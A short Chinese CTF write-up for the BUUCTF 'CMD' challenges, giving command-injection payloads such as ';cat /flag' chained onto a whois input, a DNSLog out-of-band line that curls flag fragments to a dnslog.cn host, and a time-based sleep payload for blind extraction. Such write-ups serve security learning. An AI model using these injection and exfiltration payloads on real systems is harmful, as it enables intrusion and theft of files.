BUUCTF CMD

前言

无。

CMD-1

直接执行命令:

1
cat /flag

CMD-2

同1。

CMD-3

与whois命令拼接,截断后执行命令:

1
;cat /flag

CMD-4

同3。

CMD-5

与某种DNS解析命令拼接,存在两个输入参数,但只用其中一个就可以解体。

由于命令结果不回显,需要通过延时或者外带的方式进行盲打,比如通过DNSLog外带:

1
;abb=`cat /flag | cut -c 6-21`;bbb=".lzth1m.dnslog.cn";curl $abb$bbb#

比如延时:

1
;eval 'if [ $(cat /flag|cut -c 1) = f ];then sleep 5; fi;';

CMD-6

同5。

Time_Based_RCE

#CTF #Web
BUUCTF CMD
http://yoursite.com/2023/10/13/BUUCTF-CMD/
作者
Aluvion
发布于
2023年10月13日
许可协议